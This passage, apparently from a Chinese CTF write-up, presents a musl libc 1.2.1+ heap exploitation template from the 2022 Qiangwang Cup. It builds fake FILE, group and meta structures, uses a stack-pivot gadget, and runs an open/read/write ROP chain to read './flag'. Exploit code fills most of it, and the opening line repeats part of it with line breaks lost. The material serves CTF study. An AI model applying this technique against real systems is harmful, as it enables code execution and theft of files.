<< 5) | (sizeclass << 6) | (sizeclass << 12))fake_meta_area = p64(leak_secret) + fake_metapayload = ''payload += fake_filepayload += fake_grouppayload = payload.ljust(rop_addr - payload_addr, '\x00') # fake chunkpayload += ropassert len(payload) <= fake_meta_area_offsetpayload = payload.ljust(fake_meta_area_offset, '\x00')payload += fake_meta_areapayload = payload.ljust(0x2000, '\x00')fake_node = ''fake_node += p64(4)# idfake_node += p64(fake_chunk_addr)# name -> fake chunkfake_node += p64(0x100)# name_sizefake_node += p64(2)# typefake_node += p64(0xdeadbeef)# fafake_node += p64(0)# lsfake_node += p64(0)# rsadd(5, fake_node)add(6, payload)
而在有沙箱保护的情况下,需要进行 orw。
对于 musl-1.2.1 及以上版本,可以通过如下实现栈迁移和程序流劫持。
mov rsp, qword ptr [rdi + 0x30] ; jmp qword ptr [rdi + 0x38]
总结来说,就是在有沙箱时,需要修改结构体的 3 个地方:
常用模板如下(2022强网杯):
# Flat pwntools script, Python 2 style: generator `.next()` (Python 3 spells it
# `next(...)`) and `str` payloads padded with '\x00'.
# Names used here but defined elsewhere in the surrounding exploit: libc, asm,
# p64, p32, leak_secret, add.  The two libc offsets (0x6fe0, 0xb43a0) and the
# struct layouts below are tied to one specific libc build — TODO confirm
# against the target before reuse.
payload_addr = libc.address - 0x6fe0
fake_file_addr = payload_addr
fake_group_addr = fake_file_addr + 0x90
fake_chunk_addr = fake_group_addr + 0x10
# Round payload_addr up to the next page boundary; the meta area is placed there.
fake_meta_area_offset = ((payload_addr + 0xFFF) & ~0xFFF) - payload_addr
fake_meta_offset = fake_meta_area_offset + 8
fake_meta_addr = payload_addr + fake_meta_offset
stderr_used_addr = libc.address + 0xb43a0
rop_addr = fake_chunk_addr
# Gadget lookups: each libc.search(...) yields a generator; .next() takes the first hit.
magic_gadget = libc.search(asm('mov rsp, qword ptr [rdi + 0x30] ; jmp qword ptr [rdi + 0x38]'), executable=True).next()
pop_rdi_ret = libc.search(asm("pop rdi;ret"), executable=True).next()
pop_rsi_ret = libc.search(asm("pop rsi;ret"), executable=True).next()
pop_rdx_ret = libc.search(asm("pop rdx;ret"), executable=True).next()
pop_rax_ret = libc.search(asm("pop rax;ret"), executable=True).next()  # looked up but unused below
ret = libc.search(asm("ret"), executable=True).next()
buf_addr = payload_addr
# open / read / write chain; buf_addr doubles as the path string and the data buffer.
rop = ''
rop += p64(pop_rdi_ret)
rop += p64(buf_addr)
rop += p64(pop_rsi_ret)
rop += p64(0)
rop += p64(libc.sym['open'])
rop += p64(pop_rdi_ret)
rop += p64(3)
rop += p64(pop_rsi_ret)
rop += p64(buf_addr)
rop += p64(pop_rdx_ret)
rop += p64(0x100)
rop += p64(libc.sym['read'])
rop += p64(pop_rdi_ret)
rop += p64(1)
rop += p64(pop_rsi_ret)
rop += p64(buf_addr)
rop += p64(pop_rdx_ret)
rop += p64(0x100)
rop += p64(libc.sym['write'])
# Fake FILE object, one 8-byte field per line; the path string occupies the first field.
fake_file = ""
fake_file += "./flag".ljust(8, '\x00')  # flags
fake_file += p64(0)  # rpos
fake_file += p64(0)  # rend
fake_file += p64(0)  # close
fake_file += p64(0)  # wend
fake_file += p64(0)  # wpos
fake_file += p64(rop_addr)  # mustbezero_1
fake_file += p64(ret)  # wbase
fake_file += p64(0)  # read
fake_file += p64(magic_gadget)  # write
fake_file = fake_file.ljust(0x90, '\x00')  # lock = 0
fake_group = p64(fake_meta_addr) + p64(0)
fake_meta = ''
fake_meta += p64(fake_file_addr)  # prev
fake_meta += p64(stderr_used_addr)  # next
fake_meta += p64(fake_group_addr)  # mem
fake_meta += p32(0b0000)  # avail_mask
fake_meta += p32(0b1110)  # freed_mask
last_idx = 3
freeable = 1
sizeclass = 8
maplen = 0  # NOTE: assigned but not folded into the packed word below
fake_meta += p64(last_idx | (freeable << 5) | (sizeclass << 6) | (sizeclass << 12))
fake_meta_area = p64(leak_secret) + fake_meta
payload = ''
payload += fake_file
payload += fake_group
payload += rop
# Guard that file+group+rop fit before the page-aligned meta area; note that
# `assert` is stripped under -O, so a release run would pad silently.
assert len(payload) <= fake_meta_area_offset
payload = payload.ljust(fake_meta_area_offset, '\x00')
payload += fake_meta_area
payload = payload.ljust(0x2000, '\x00')
# Node record handed to add(); field names follow the original comments.
fake_node = ''
fake_node += p64(4)  # id
fake_node += p64(fake_chunk_addr)  # name -> fake chunk
fake_node += p64(0x100)  # name_size
fake_node += p64(2)  # type
fake_node += p64(0xdeadbeef)  # fa
fake_node += p64(0)  # ls
fake_node += p64(0)  # rs
add(5, fake_node)
add(6, payload)
poc 如下:
#include